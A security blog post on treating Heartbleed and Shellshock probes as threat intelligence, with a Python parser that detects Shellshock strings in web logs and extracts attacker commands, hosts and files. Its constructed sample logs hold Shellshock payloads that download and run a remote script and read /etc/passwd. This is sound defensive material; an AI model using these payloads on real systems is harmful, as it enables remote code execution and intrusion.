This year has been very interesting in terms of massive, critical vulnerabilities in some of the fundamental technologies and protocols that underpin the Internet (Heartbleed and Poodle), and in some of the foundational software packages that comprise our computing platforms (Bash: Shellshock).
As a practitioner who has had to scramble around to patch these systems, I noticed some interesting artifacts which got me thinking about threat intelligence. In addition to patching machines, we were aware that some of these vulnerabilities had existed for some time before public disclosure. Even after public disclosure, there was a period before patches were available for all the affected platforms that an enterprise might have in its environment.
Which leads me to this: these types of vulnerabilities can potentially serve as a way to identify your adversaries. Think of it: if you have an adversary who wants to get into your network and a vulnerability like Heartbleed or Shellshock becomes known, don't you think they will probe you immediately to see if they can use the window between disclosure and patch to compromise your systems?
From a vulnerability management perspective, this is why compensating controls are so important. You must protect yourself while you are waiting for that patch.
However, I would make the point that it is also extremely important to log any attempts to take advantage of the vulnerability in as verbose a fashion as possible. If you have the choice of two different compensating controls and one gives you a better view of, and more intelligence about, the attacking party, choose that one (actually, choose both!).
Different types of attacks can provide more detailed intelligence on your attackers
Heartbleed didn't really give us much in the way of telemetry about our attackers, mostly because in the early period after the disclosure, there wasn't a good way of detecting probes. Later, there were some signatures for IDS. At best, you'd get some idea of the IP addresses that were probing you. And as we all know, IP does not provide strong attribution. Using it to identify your adversaries is not a winning strategy.
Shellshock gave us a lot more to go on. Attackers had to craft "attack strings" to take advantage of the vulnerability, and these strings appeared in web logs (typically in the User-Agent, Referer or other request header fields that a CGI script would export as environment variables). Reviewing logs could give us some idea of the attackers' approach:
Tool repositories
preferred commands
desired targets - both hosts and the files on them.
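The following is an added example of the log review described above; it is not code from the original post. It parses Apache "combined" format lines, flags requests whose User-Agent, Referer or request line carries the Shellshock function-definition prefix, and pulls out the commands run, the URLs (tool repositories) fetched, and the file paths touched. The log lines are constructed for the example and use documentation-range IP addresses; the field names of the returned dictionary are this example's own choice.

```python
import os
import re
import shlex
from typing import Optional
from urllib.parse import urlparse

# Constructed sample log lines (not real traffic). Apache escapes embedded
# double quotes in the User-Agent field as \" which the parser below unescapes.
SAMPLE_LOG = r'''
203.0.113.5 - - [25/Sep/2014:10:01:13 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \"wget http://198.51.100.7/x.sh -O /tmp/x; chmod +x /tmp/x; /tmp/x\""
198.51.100.23 - - [25/Sep/2014:10:02:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 77 "-" "() { :;}; /bin/cat /etc/passwd"
192.0.2.9 - - [25/Sep/2014:10:03:02 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''.strip()

# Apache combined log format; quoted fields may contain \" escapes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)
# The Shellshock trigger: a function definition "() { ... }" followed by the
# trailing commands that a vulnerable bash executes while importing the variable.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;?\s*(?P<payload>.*)$', re.S)


def unescape(field: str) -> str:
    """Undo Apache's escaping of quotes and backslashes inside a log field."""
    return field.replace('\\"', '"').replace('\\\\', '\\')


def split_commands(cmdline: str) -> list:
    """Split a shell line on ; | & (and && / ||) outside of quotes."""
    parts, buf, quote = [], [], None
    for ch in cmdline:
        if quote:
            buf.append(ch)
            if ch == quote:
                quote = None
        elif ch in "\"'":
            quote = ch
            buf.append(ch)
        elif ch in ";|&":
            if buf:
                parts.append("".join(buf).strip())
                buf = []
        else:
            buf.append(ch)
    if buf:
        parts.append("".join(buf).strip())
    return [p for p in parts if p]


def parse_commands(cmdline: str) -> list:
    """Return a list of argv lists, unwrapping 'bash -c "..."' wrappers."""
    argvs = []
    for part in split_commands(cmdline):
        try:
            argv = shlex.split(part)
        except ValueError:  # unbalanced quotes in a malformed payload
            argv = part.split()
        if not argv:
            continue
        if os.path.basename(argv[0]) in ("bash", "sh") and "-c" in argv:
            inner = argv[argv.index("-c") + 1:]
            argvs.extend(parse_commands(" ".join(inner)))
        else:
            argvs.append(argv)
    return argvs


def extract_shellshock(line: str) -> Optional[dict]:
    """Return the attacker TTPs found in one log line, or None if it is benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for field in ("ua", "ref", "req"):
        raw = unescape(m.group(field))
        sm = SHELLSHOCK_RE.search(raw)
        if not sm:
            continue
        argvs = parse_commands(sm.group("payload"))
        urls = [t for argv in argvs for t in argv if t.startswith(("http://", "https://"))]
        files = [t for argv in argvs for t in argv[1:] if t.startswith("/") and t not in urls]
        req_parts = m.group("req").split()
        return {
            "src_ip": m.group("ip"),
            "timestamp": m.group("ts"),
            "uri": req_parts[1] if len(req_parts) > 1 else "",
            "field": field,
            "payload": sm.group("payload"),
            "commands": list(dict.fromkeys(argv[0] for argv in argvs)),
            "urls": list(dict.fromkeys(urls)),
            "hosts": list(dict.fromkeys(urlparse(u).hostname for u in urls)),
            "files": list(dict.fromkeys(files)),
        }
    return None


def analyze_log(text: str) -> list:
    """Run the detector over every line and collect the hits."""
    return [h for h in (extract_shellshock(l) for l in text.splitlines()) if h]


if __name__ == "__main__":
    for hit in analyze_log(SAMPLE_LOG):
        print(hit["src_ip"], hit["uri"], hit["commands"], hit["urls"], hit["files"])
```

Across a day of logs the `hosts` and `urls` fields cluster attackers by the repositories they pull tooling from, and `commands` plus `files` show whether a source is scanning (`cat /etc/passwd`, `echo`), planting a dropper, or going after specific files, which is far more useful for grouping activity than the source IP alone.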
Now, these are the kinds of Tactics, Techniques, and Procedures that provide better identification of your attackers.